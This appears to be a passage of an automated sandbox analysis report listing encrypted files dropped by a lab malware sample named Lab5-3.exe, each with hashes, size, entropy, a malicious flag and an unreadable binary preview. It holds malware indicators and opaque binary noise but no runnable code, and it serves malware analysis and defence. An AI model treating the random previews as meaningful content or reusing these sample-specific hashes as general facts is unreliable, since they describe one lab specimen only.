                                                                                                          SSDEEP:48:Q6L+puaW/NOf22yHfUTid3hBaUoSGFcmeykEdEElU92i:9+puawNuGx0uKeY2ElUJ
                                                                                                          MD5:630B7B63459543CDA6ECA8CCAAEAB7C0
                                                                                                          SHA1:4262444F09EFA0B0D37C60DCDEC001A75378CB54
                                                                                                          SHA-256:AC78683D821589AA62B2E265C80B7B47EE6063B65ED617275A3865B9C26AC278
                                                                                                          SHA-512:9A412CA65034158514630E410C603ADA75FA07DA8402427159B50ADD31B916AC43212CE19FB2A464DF0F65AC93E2B61A731B9035B0725F29C3C6AE8BC0233497
                                                                                                          Malicious:false
                                                                                                          Preview:.Q&0.....q .._FD.........S...r...@..Dd.L.Ov....%.aSLE..3....z.....K....J...y..z"..Y....GV.T@.v`..wN....42.Z.h~..Sgm./..!.a.m..F............._T>...../..{. 9c4.g.p!.)#.h/.2..2.<s...1..hN.....=..?._.[..MCb...[..U...................IU3.n.....VnE.'.........`.&~.M.W..O./.)s.......s..o.}9.F....7...[..+....V..7\1c.......x.j.....B..W....;.....C...l..1(q.aXP.&... /%...hc.3...ie@..._..U.{..kB.'=..cgAy@.....-..'x..a"r..5.b.j...c.o{..&.b...2C8..j.`....P...~....g.....5....=...^.......B./.d...S\#...".Y..L..b.U......sI.EIkD..C.........E..o.......;.r..%..j...)W...jKYt...9........S.7.j.....tt8..[!C...&.~....T.^.lz)g........~.O...,...&.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):33632
                                                                                                          Entropy (8bit):7.994711772004521
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:a5/AYzVM37acniGS8G2j6R8rcz7+/jLM88G9MqfhUZ:a5/VMr/qSL0y/3M8ZCZ
                                                                                                          MD5:53588EB6A1C00C42A8A3BEFA69CEE6CB
                                                                                                          SHA1:91C3DF0218F86ED0C04834AF6C971CC91EFBB14E
                                                                                                          SHA-256:FA7A8D727F01384F2123DE4CCF1EC1687E18DB5872E0ADA679F118FF8E45C900
                                                                                                          SHA-512:6BDBEDB1AFAEC44000FDD3167A0E3DC427CE185AE5FA47EED2D2AC2F905C95A921099C877FD99C6CAFFADBAF7BCAB975E6ED8BB1C75D9616103E66C8C365EBCC
                                                                                                          Malicious:true
                                                                                                          Preview:X..t].-.+lU..x.<..~.^.l.p.......t&..R.f..~....U.J....\;..>.y<.+.......I....Q^".....}.~U...xO.R...g.lM|.K..V@..O.3.._3&-..g..e......H..}.b.W.<.........8._tc......m..7J{._..N0....?UI....1..E7[........6.........,..*......G{U."bp.<.=...vz1..'q.&........).F.]....5..=.A..8......} ...b.&...R.........V.TdL....zc...rBIsB.D..@0.....I..j..g..h.pD...$.Y..J.N.q.U.....w\v..A....[.]...)..8mN..'x.>).?.D....k.....h.%C...."..&`...\..9)..1!..Hj..d$...,.B:*}%..:G..Ru..XE..P.....\.....}...).Xe.E...C.nX.K.L..-...J.U..%.V.."c.^.9.h;..V.-...h...e..<.l.V. -....7y.k.\..T..g.>.k.z..U}...{......(..l.i.Qj....'.g.p.{.6.......]=...x8..!.,..VV.L......LN.%x....f[.j........E.g..I.;.LW.S.'..8h.s]..../(.#...Y]..n..[.3...K..e.t.'..i...J..............t..A...7.C..M...fs....e.-.u.aFM...../...E.ICL.7....i..m6r.U.-B.2Y..-..=.e...>.WG.8..Mk.....4....i.-........;./.c....v.....W@...1.8.q2..;.q..N./M..,.........7.....gf........q..*....}.e.~...-.~.p..%..^.s.]1..H..M>.l.W..M].......E
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36656
                                                                                                          Entropy (8bit):7.994738031500789
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:FUmXe+aUP2vtqLbCsLgFIJdrZ7DDYVB6MekTzaRFtkNqzt+4Z:FUN+3YtX2JdrZfczteCeZkNqzrZ
                                                                                                          MD5:DB4E1446CEDA8D2651A5610DB09983D4
                                                                                                          SHA1:ABE17D53B3EC3FC3076C8AA68C2458BCC4752C49
                                                                                                          SHA-256:47B2661CDD733F74E865652388D1CC24A996807A47F8BA304ABDD8A48B4F66E9
                                                                                                          SHA-512:0ADD91B9CB58F9DA08DF5053C0EBA5F72C564C63AC50B5DBFAB1DDD9342A4D802F4B9C820A1D3458EB14B6F85685366E52745B1FE044E981B01BE1C033FF4D98
                                                                                                          Malicious:true
                                                                                                          Preview:..@.].........6.......r.1........3.-|.~b.;.:..S..zxy...f%W.]-x@.gJ....H.1w......R?..X.....[..?...H..[^.....M...(....u...9......>...K.V.Z:.p....../.=Z...wKG8.7W............J-.b[K&).=.4.l2.=.[..i......C&...4.-....).Q...7...k....@7S{k.I......#...8..m.......DZgv...T.R......... X8..j}~_^...~...D.......@n.....w.1.u..1g...>9..|6.'&;.orz.6a...U.k..+..S.f7.t.R...8..+.z./.c.'O.....A..-....Q.+e9.<-....%?....aU...F2C.i..K."....f....N........$VC-.6.........D..-..)...[.EP.@T.fr.-.P..|.jF......b.'X:K..4...W;...Z.....Z...../ou.$....m\c...+psH...?9b....tFa1..Yl..v.R).. %pq..f..6.^5&...vw...6..=.:..(..k.,..~....u.L(....c..I..R..V..O.......: D.1....L.....)....\./.f..y.....-....N.M..y.....'...U...6i].h.X.?.Wy.%..<.n.].^...|./..=7......7.Qi.L.0.p9Jz.JL.N....u.YHm.Jn./y.9...U.5...Z.%V[g.QB.!t...KCm._-.a...}.. %.....g.@.3VQQ...@..1..aM....1.C.)....m3......t....S(....C./....[.....^....s..U...X..k.K2.~.J'q.1T.]W=..X.w'./...z.....,....riiS.$......Xq.}Lbj.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36912
                                                                                                          Entropy (8bit):7.994430688271152
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:D/3RQigpWg68GOW9K2ArTl3o6dBp6CwIratZ:DPOpfqAr+iv675Z
                                                                                                          MD5:0C3D9554AB3AC7813C754868D497C453
                                                                                                          SHA1:FF101AD45D2DD60C9AC2E4292FA4BC1D277D746A
                                                                                                          SHA-256:22A0E2FA6341AB2DAE404D68842DBB64578582E5028B7E7FA568B00CEAC4570A
                                                                                                          SHA-512:8483C9EB3E35B7C7EAD83DDE75CE9AF87DA4D72D18B4AA6B1B4427BAF3D10F31F734269C869FAD14CD8835CB54B804B9DE1733DB535A74568182753352FDF20C
                                                                                                          Malicious:true
                                                                                                          Preview:$..U..x../..9.._.d+.=...'...-Am.(.@o..K o\........7...I...&..fz....>Oz.N.'.-...g....."....8.....8.s6..`...?..Q...$'s...R.iE...I.H.>.>.:.{..k...K...v-..q..d...0.e?.z....%n...T..-/.<..(.......$Ka..f$.;...|T..C.d...._.QP..;...-y..y.q....~.GN..F?.f}.......*[...t?T.M3....y.v.......(|..W.A.t..}.E.Uw..P.S....X.I!..."..s.Ev.........RMhM.....)...K...-5..P.k.S..6Q..Z..\.<R.....h|....t...u.%.E.x,......iU..@|^....).P).cX....%..`Cu.}..<.......[QO...n..8r.[........5......-....H`.5..t,q..E.F...ok.g.U.!...k.axoT....0..g3.......@Kc,.!.v.....D.g.hdr.p....rC....N7...[...C.r.V......%..f.uZ...?.\@.e..;%+...3....h..R$.y.W.y...~3.he...............r.....d!..~...S?H.G...uj._...@.-*..[.>.m\.W..-1..6...#......!..E.K.T.h....m....%...Z"...S))v....mr.^.[.k.._...........V...=.tlB..._...x...^5S..N..~......t.|..-.q.T..N...~r....lq...y.P^...k?...G.....]w.3.+q.z.....!......-.(...6..W..k...)..Oq..^i.7M.....f..)._..LA.}.BS.b.Zv)@.?.1.....f.MV....3.!e. h..|.(.dUG.auPS..]o.F..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36464
                                                                                                          Entropy (8bit):7.994482762491258
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ILhtrre0CBA3XAACscX5KCeugKPs2kGOfINoLV0d7uuPwqWdODxLn9xKZ:Gzi0CK1cX5KCe7KjkGh4mDYqHn9xKZ
                                                                                                          MD5:9E0A8E85EF7E8CE92C6C4A8D4262F48B
                                                                                                          SHA1:9B06C31A40EBC83278A7E9F32BDE068A8D30D313
                                                                                                          SHA-256:079845E9078667BB688A2E0EFAE51E6148C8BFDE4C6C2F3190EF5A3F19961667
                                                                                                          SHA-512:4E5C19669F93029F69E837C780818231AD0D3003C4B7E9EE26C1814A971545158B50F8D92BDA196EE650989A723318ABDB4AB3CA05964EB1D5E0082A675C3F01
                                                                                                          Malicious:true
                                                                                                          Preview:....Mk.2..zA..c.9c.R1.o......DH}..._....w..8.mS._..... .vD.d@.%..........,..$K..P.B]..Hh{.H]?f.mY...x.Qi.Y..M..R....V......Y>...(..L=..g..W.y\.j.6...j.....<c..B.3.h...F~....v.<...py,P..........W...H.H.$-1f.......v8M..+7.L..*8......&..7.......f..f"..A...4Z"....nU.>.~.i<.X&...]~.`\.Fjz..+..../.l.Djl...y...=HH.......[.......|...........R...[...rL.^..:.y.......L.....ba..n......p1#.g6>Y..'.:.f.W{/7.0..`S.D.:HK...7..../..`.....f.....I......I..D.3:'.g..g[.`2y.hh......!Z\X.n..e4c..n..F.ZT.....|.PnT....X..n`...q.....WQ.D]...l.z...L..E.C..b.|..).....I/...f.......,.......vb...:...........<+.....M..q.....e.nX3.;.^*K..p.o.v.t..... .........r..h~q[@...E.......+...{N..r.g...o.T........K@..v.J.b. .....wJ_....@jr.+N....Mf.!...:.Z.$...U..=6.Hl..4...|..7.,z....Sfxv.fL%O..}Za7WSl.%&.$...U..:5..e..]/#o...*..U.n....).&*v...&.w]..O"...........n.G.&.(Z.$o...!....B...s.0.[..."....O......{>R.1.%.....i5.c..#..E.,...yP.......#..k.nN.*:tW...w'U![-.Id....DW
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):37936
                                                                                                          Entropy (8bit):7.994986355305259
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:8Toefbk55ttY4WBOPUqKZy5pOizy2Ehz3eQV+gN7+51FpelkZ:8TNw5rDt//Dy13/VBHkZ
                                                                                                          MD5:6A62A4BC65370FAC7DA901EFAE69901E
                                                                                                          SHA1:48D3ED4EC223FABC841CB279AD773028379D6399
                                                                                                          SHA-256:E7C20ECCF0E5092E0D3681C4AF1BB01EE0B651BF20997158B4B74A8B24C72141
                                                                                                          SHA-512:E2CADC0691556C4384F1C4AE1230693F380CE2087C2E5A8B70B98665FF1D54EAF2ACC919D79BBFF0A043533DC4FE76097C6E959FA0660FF0C8B1D952D68F65E3
                                                                                                          Malicious:true
                                                                                                          Preview:Bh...5\%._..!...1]<..f.wnr......P...........u...x..,...Q......`..[$f"?t..."'u..Z7r... Is.#6..cus.=V..@...6+f{..Ns.. ..A..=(.n..5.9.t.. ....v...[.f.A..c.....k....2..G.q.3.E...h....B...?.ZTVO..3x...=&4.r.d&..w..n4..;.e@kF~E..z[...:.^.......YbOK%F.....>.a..'.e9.......NH..6u..F..~.Q.k.|.....\..`^....o_.9.x..........[.....*.~.6....xV.8.>.2<'.Zk2...f.....4U...Y..U..n..><`.......`..(.]~WNm....c7.F....b.Zx../]......b...Q.Sr.z7#..*.<l-...V....Ff.Y..^..zBHr..EQ.H.....h...h*..g...\.m........e..=.H.k9.7..OJL...c.,.)Z._.$.Q.#ly.w.p..."......lX..e..~....e...(.4...3..`..Y....!.......P.dh\..a.....3..P8..[.sc...D}B..g.....\B.DRb.mR.......y(?."...re\.4.D&q.<..?..........".YH..{mv...B.....Q..7....Kei....)....U.......t...A.{.S....yPO.b..z..,.A..9.d.q...]..Ns7.....C.V.Tp.S.U.....fT...........;.L>...@....:.C..,../.2...I..G#x.!.I.....[...<.{..l_._4.m.)....%.A..$..v..-.~<r.0[o......E..t.....T..Ww..D....T.....h.-.4-....=...._]@1..........F.o.$+2......[.7.... 3a..'.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32288
                                                                                                          Entropy (8bit):7.994058063296861
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:V+JHz7SjKC3iKcz44B/P3LvLGaRMaEUZGm2Z:+TmJiKmVPGa6VUZMZ
                                                                                                          MD5:3DE7C5F9BC7F89ECAA73E50EA6B6D359
                                                                                                          SHA1:3DBB8CFEE2A56022FA81AEB1965B5D69E68936E5
                                                                                                          SHA-256:9FAB40D1B325F649115F8626BC68F4904D93462233B5852559381B6575441B08
                                                                                                          SHA-512:181E61271D62AD5CD16AC823F4C21D90B580B2F22C466235928BAFC9F039CA2C4DDBB8D7733233FA08D05C0AB0FCE508BDC9608A02A1A9FFF8A59354B31C3C5D
                                                                                                          Malicious:true
                                                                                                          Preview:+..N..8t...0wZT..!..2....._s.O.*:.E..1..$......jm..MFdw.X...&...Z#.....Q...p........>D{F..P..k.....b<.j...K.o..;S........g.."_.}....K'....T*.q.RK..OUT...O.K..9....c-.Y.f.?r).a(;.#M! j...e...3%^5..........i...:...h.+>.M.H../X.R.j.n.b.........Q.Y.4.]U.}..&........D3U..|-....{MO..f\.....gM.6....i.....)S...[.:........`..U0...?.......4.4...j.....Z!g.I....sQ.X...s....#..B..Q.^xJ..g.....j..R..G..w.s....R.U.!.i...k...`..Z.s..I.....Ud...*b...>4,....y...N.lwi`].5..)../6.^.........DM*.,g&....K.:.h. ........F.9.ZET...1\..F.cF.a....Co..W.5G;..:c...h...*.yw6..C.Zh..".zZ.X....;.|.F.N..,.t.L^...e.....zL.....i.,..U.N...W.g..A^..l.Z..,.k..M+...+..kKuP(.cw.`...N.V.lo8.b.L.E.e.6......X*.Nb..B......f.b..z.?KDC.`...lX.N"`q-..W..GT.pI..9Y.?,...X...3..w.$..}*......m.4..*..d...p...av......WR.8.{.L../.;.P...4.P.e(.v..p.#W%.$.....]..%.4_..br.ZC..@.....6d.f.T.I.%h....G%lg..*i ......n.'F..p...).;jd.. ...3..A..H... .}vE......&%.....~..w.....c.T....M....w.6/
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:very old 16-bit-int little-endian archive
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53904
                                                                                                          Entropy (8bit):7.996654905193634
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ImAbsqa+Vgx1mVsCNP0Wzf/o+7ZE8XIz4RkaxLJwfMsL0ZYJUZ3lw5ko7Z:IJsTTY9/j/oIm8QgZsBJi3O5kGZ
                                                                                                          MD5:5A2CF8FE0AC1211B75DC4D86DEC62C16
                                                                                                          SHA1:9D53697F30228AFB3B4C1ED069C518006943B494
                                                                                                          SHA-256:2FC328FC1DFC96A55BADC2665645A889E299D06251BC2434F86E2CD3619838D1
                                                                                                          SHA-512:6A65B39693783D4B52C55118B517FA5EF75D60CB17DD98A595BEEC8B2E3FA3F31A7D7085EA813766940877AC02CA8B1CA04E781B9DC456FCC4F1E806D812ADCD
                                                                                                          Malicious:true
                                                                                                          Preview:m....O.q.f#.<.. ..:......\...t._...}'..m*6o..h2_.&.4..m.}K...k..?..@......5.u.u_.,.-o.o..E.e/_...5....!9.v..<%...5;...Y.%.l......J....k...g..7..+....=..QuDI...*......l.. .y.....L].B..O.}.G}|.Cj....f.............I..p.>.6.U.I=.+...k..... .q......zr.R] 4a.... Q.{..c.B....0.y...y?7........g!..,.....;..|.U?B...T%E...vJ..m[td.D[R..-dR..*imK.t..&.A.9.X9(....:....d..cui=:.U].rF.%..D.5[..(..>.........(.E...n..je..H\......Q.....X..l.#..#....Y.......s.Sk..:XpA...yi..Zl.....n{C....p....;h.*....M.8.9.....6...H..0..4.......~.I.q'....T..sq.p...Q.$..y.u.......Q..er.cO..#.G.KY...d....|=f..t...S.d."....'K.....:`.q.f D...\.............Xx...R..Cy[7+N4.].....:JF...&...G....F.8......q.T1....D~-.H..x..X.vy.?.......$tP'/.'...\...6.....|.q..b..S..#.).K....um.+,i.?....b.989...Q..9..h....(.F....^Oc.v...IExPX.0.+.i\6=....nt....%{...!y.)...............%Z..?.E...o<..Q.%M(..L*H..QTr<.8.....<.,..................z..v..=..*...@.D..Q.0...K.n........+^..g.....oL{.B.cPU.^..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36704
                                                                                                          Entropy (8bit):7.994247659708354
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:XlNvDOK5DCxXwp95sJ1FGgdI9fge3KXsVzCZP7lgxowQjWZ:VNr36Xm9GjFJdI9f5as1CJ7lWUWZ
                                                                                                          MD5:0D4EBA8C956D809F44A45ECD35D47EF8
                                                                                                          SHA1:CB934065A016CB55098E6819976EEBEFCDE81529
                                                                                                          SHA-256:D1B89414778A9738F44F14C8CBDE5345E9024E994E3FE27E4ACE5FAF31ABC9C0
                                                                                                          SHA-512:61F2B8427A42F8A887DCCC7E4E7FC93CE023A1C876B8416703B7D4C7134CEFDB2700481E0B077872056715D0513F2D597FCD6ADC7F5B23A55DD838F432A46ED1
                                                                                                          Malicious:true
                                                                                                          Preview:.k.......V.k'_.u..Xc..r\......7w..i..H.,....@.r=]zP._x@..^W).CV..d....FcW....>A....4....`....&..}.ao...=..j......O..0a'..._.b..c.}.u..s....X+...1..3..C...o.#.^..Kw.......ZPl..VMy.8.H._.~..k .Wv.z.......1......)Lv.3.}..3...g(*...R...;03.g..`..Z$..V.vY.mb....Z....|.L7..Pr.:G.o.!.[s....i.x..2.L....rw.............Ao..5.1.4...W&.L..q'.?..Q....F.}`...0x...1..^o......:O..$.U...t"..k.....=..S..'Ce,.....o....M-..#..Rk97.]..s.FVN........bI>dz\......O.W.Tv.Cw.X...../..7.`U.o...L...a....M..a...(...{......Ny..tq0.G7.0...cz......|.....0......*.9O....%...........:.A_......x.{..@@.#.....t..?.Cy0....,,*.l..F...".........Ra.<>.....3.....*>....U.{.|.T...u...c1Y....j.e.........../..M.........g...W[.'Nd.C....e..4...9.E}.q..`..../YF.2.y..EZO.....h8W$/..C..*.Zy.L..D....}\..<v0..$_u'/_...\...C....(..A.a&,....7..O...ta......W......w.XU/......^O>.?.Y(..> .v....d...P...kW..J.|.2..{a..&.^.rd....D'....NI./RX.N.E..By.Py,.u....$.....%./V*]W|9J$_.F....._.o..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35216
                                                                                                          Entropy (8bit):7.994471661693575
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:7z5NP5sYP1zC22caPyoGKDJuGqbAi7c1cjNcZ:J9eglC2DywKDJu5bTFyZ
                                                                                                          MD5:F4196FB3A9D237A203F27FDAB785DD14
                                                                                                          SHA1:D06BD375A3C9752BBFE436455108474236EB4F51
                                                                                                          SHA-256:132012A323A290FC66C2BDE2C2791171CB002D66E0B74D83AB57A46AE74FE45D
                                                                                                          SHA-512:710A5DC3DFAA5CBED5FBF4C69B9FC411F34A85724EA3E25C4A0425BC32B0871F2D68E6217AE2ED27EA51E361FE5D9D786A484ADFC05FFF500FB95B260BE9BBEA
                                                                                                          Malicious:true
                                                                                                          Preview:....+..A.g......>.G ....M..;...S.S.."..`c....j..q.u=....P......V...0..U.8.Xt...x}d<i......qp.....t>....Qb..=.H!fIg3O......V..8...!.g.I.. .....l:..vl...Z....Cl..E..al.Ld5<.k.>.!.$.\F.........p.....o.`..#....jpv..D.Dw.....n..e.....I.-E...b.b../.7.y....U.^.+.......B.^.............xl.]....n6-.."....n,....Q.=....%..hvm...Y....:.Z....J.a.....kx.hm.....$..S....=U..4.?X...(..._.:tIv..!....uYk...~.z...v-....Zo.!...<..*)..U|..............7.,........I..(.^...Rj., b...=!s..`..-1.k.G.E0tn...A...8.G..B?sU.2.Cq..p.0z.#Y....*.Tg.N.3)..T.............l...!.?>...e-....Ft.MT`K...4.~.3s.IG{d....k...Q..s...........rb.P..b.V.K...../.4l.<.~..II+q.W....%....V.'B..g.+!I..?.6~...P"/.H......zn.).A.n9.y.1..2~%]..}.._O....\(..T.:..:.]..d...tRkt `......Q(z......7Ui...>....N....!...T...(.S.#.@gU....2...z..t..V..$~.P.q.;.\.N.j.<$...$..u.ak..9..I...t.upd.Q....,I.@m.j.%..X...G.Z..?p..pE.Q.......].....:..'.@..t'..e.!.....B?..y.....xn:.h.....\.c.#y...=H.;[IX'.|.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):34064
                                                                                                          Entropy (8bit):7.99452829923526
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:sCX+R+pFSW9Pcmz2oPdNlkQr69rUaJZl5WZbsWH8FB/5Z:sM+ROS0PJyY0QramAu87xZ
                                                                                                          MD5:92AA2431006C2B71AFBB8C61703CDC92
                                                                                                          SHA1:497B13BB0190C221B2BC4884ADA87CCE7F2DE487
                                                                                                          SHA-256:8ED2C5EEB1180736876598A9F3F1D0B636B2D06ADA81AC8F2C37E10D035BDBFC
                                                                                                          SHA-512:6EEC4C448432C9122A685A284E45F6949D5D74082E65AEEC1B8B790D531DE3F5586B00C4935FDD95450606C345C86F19FF241D9262C9722872086A3F28E271DA
                                                                                                          Malicious:true
                                                                                                          Preview:.]7qN.......y..;.Q.KZQ..v.....P6#.............X.|!:j4k.~..u8..h..<....T........;H.}..@".I.#%.?.iS.U|..0.!\.C....B....}.%.J$@.?y..~J..Q..z...5.b_.^...._eI.E......f....._.d......m..A.>....{4..Q_r.N"..k...?wx.[..o("..Q.\.#...T.V........l.._....gI.H%..m......l.ae.g.(.P.-.b..#.....K.K.t.M..h..D...7. =A.......>...5V...[..<.t..?.@.}DOe*.2a@A3y.A.L..W...|..[.[.P.m!.......E....5..T~,<.M....0.r.....D.......2..c..`/J.....|.....D....iiG......l...P_.....T;....9....6g.k.."..X.~......Z..c1}K..g,OL-n9.P.v...t..l.s.{.Yvq......uL.s...|..;.B..-.."..c~f:w.).....:.B.......!.....3..3../. l...e.>.l.a..c...?...S....J.T8.........w..&..T.Q.ZTfH4bP.fTD......7.|.N.O......-...^H.p.F..O$~..d....b`ZE.X.........k1?fR..K..Xs.DFp.hu.3.Q......+....Ru..n..&.a.....iK-#...N.M.N.^Y..W%.h.^.;-...).......v.f.=.....X..........<.L..o...p..eHODK`\2vnb...f...7...t ..".P.....h.PAe.,...=...~ll"iZ.._>C.9."?..N[8.....$.uA..C>o%'.;..3.....F.&.+e...[yL....AJ7..rx.....;.qCpX.W?.p.IW...v.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36816
                                                                                                          Entropy (8bit):7.9953523815428955
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:cdmKe4MnsW90IpW517ujYeo3BW5k9U5gBw4oArW5WdamhrZ:mmYMnsA0+e1knv5k9mgNXYWAyZ
                                                                                                          MD5:2CC703A0430900E8605155CCDDBC4B0D
                                                                                                          SHA1:5A4C68353D37298251D37DBD5B15A46BEC2489B8
                                                                                                          SHA-256:415D6AE99DE4D4B03D6657529136A4C30FE1168A31F4C50BE2BF535E33DCD98D
                                                                                                          SHA-512:CF70E49634EDE393B891E8E6647E128640DF1FA288ABD702E564FCBAC0DD95F4708794ABEB62B0E51DB73281C9D27F1737B926ACD99A036065D11BE029197A61
                                                                                                          Malicious:true
                                                                                                          Preview:...ExB..A.....^x.Nk........_B0d...P......K.....N?..|p.....<9$+.S|?iX..~...-4..d....f.J.h.]n.g....U.o5........Un..:D,.J:0?..y.*ho....^............l.q.<n`...`.*.6..=..q....%...:...n..1V[.{...g[.zL}Oo}.Jte.O..c..L......50....|y.V..[$....O......w.p........p....L`3.;.(y..r..M.BX.#....[o..?#H.!B....;..;7....)I..V..s.x.........-:...T.S].."B... .I.......x..P2.:B..Vg?...2.&...U.."....n....)H.3-.."..8..8.e.z..S-7.-.F.y.......\w.......?.....!s.w..:.aV...X.s..~..6.C#.7.h=W...........}.H(.z..8A&.m..`..`.P...U..3.".Z.x).m|uj..#....\..9..Z1...0..........#\N.K3.o[|yrZ...r.~....v......v..........*.dZ4.>.-....>d..9vj.+.....jl......n.lx.).Kx)v.L..._.w ..G.....Z.O.9l....).....,.^m.....i.....g.N.....2..............E...G.1..]...E..\6l...~.].X...Q..a.N.k.....Rmb&......,..a...e....3.:.e..S.gl...J.{.;8....i.j_....D...9.5..>D>..r.g...q...cX`L.] HJ.mV.....-..Oop C.....V.7..y........B/)..N."f.74.....k....I+..-~_.K.!p....`...p......o.e^.....{y..'p2..k.rD..H.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):54768
                                                                                                          Entropy (8bit):7.9964549234876285
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:zTBNpCaxPVrcwTnS3odWyWolRjXttkSyzdAZ:zTBNvrcTpAuxAZ
                                                                                                          MD5:42209B85275956C4969B2698165FA531
                                                                                                          SHA1:B2B3B583213F79AE5FAC3BE0F80D29DD2567E393
                                                                                                          SHA-256:7BEDA17417D1F87BF2C2B73BDB8AE963A50E2C59991C846E800ED8ED97E10197
                                                                                                          SHA-512:F36A2C12FAC12379BFF2092B507C0ABA48EB5FD198DD54B51307E004D4FD31F2117E614C8784E18A38E411E46BCD41A855332506491D6EE753FE0F277EBE9D7C
                                                                                                          Malicious:true
                                                                                                          Preview:...R.F..L."...y..$@..C..._C...>.fnk[.1..?._5Y>....x|g.;.y..m.q....p.....u.2[.s3..I_=..n.....Ch.@.......B....Y...KK...sG.xN..oJ.Qf.i&.._.A..C.....f.@..~S.H..>..f.[.`....Te.nZ.M...m..h...Q..{..`.....D5E..#._...Kc.".{$....Kc......a^.dL....#..U.....`.1...'...G..>oO.i2.....Nn..J.hh.S|...w.C..dS4.a....J..;/..|pL...S...L..Pz...%..2..R..z!..=..j.e.j`.V,..r...~..=.c...*...........c.............-.Pp4..../Ch(..d...A.....?.s....!.k`.>]OM.....?wF".J..+..8...E$F......n<...#.J...J)a.a'.."$...^s69-Ef..F..w.o._.?i.....-.<h.=>.v..U..Ie./.R...F.wi|....NfcFN....a..u..=.`..?H....~%....q1L...aS.K.}.,..m..R..8IB.~D.P..h.mK..Q_A?.oS..T]..D..n..].3.........Y....s....._D.-j.Q;..._...:.q...n'..'R.m..S. ....~N.9.@..Y...7.J.Tj..;9}.6W.y.x..wn|.\.9.n......AK3<...0ghrb,h..+...qP.s.3..@lE..C.B.=...n.b@F'....lD...z>.btL...o......gq.O?.c.,o...i.....J..l...bO.+Q'.r.r,.X;7.p.(..i...E....`hy...XlZ\..*.. n.T.^.+....c...=..I>../X......0.\......}.....].h&R ..V.W.ga........2je.nFIa....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32240
                                                                                                          Entropy (8bit):7.99489235366415
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:Z8/XyPB4owGLymt1F8ystrQGE8P74k8yJOe63L0yoWZ:ZciwcjF8yFGEOM3M6xoWZ
                                                                                                          MD5:5CA0B61D5EAB3821B4FEDA699E818DCC
                                                                                                          SHA1:7A16C7B1C616F1AA87C076EE480C8AA0A993FA63
                                                                                                          SHA-256:CCD556441E4B9D4310C42318B261FF52E3CFFA9036835F4ECAC89B0D2714C773
                                                                                                          SHA-512:A638379F54A022179CA11774DA082EB4983BCD5C1086A2BF3905725CE3AEAF5F486D306F98993454CA5898B9F2911E5828CDF1383059FDF2C00F73285AB3D68D
                                                                                                          Malicious:true
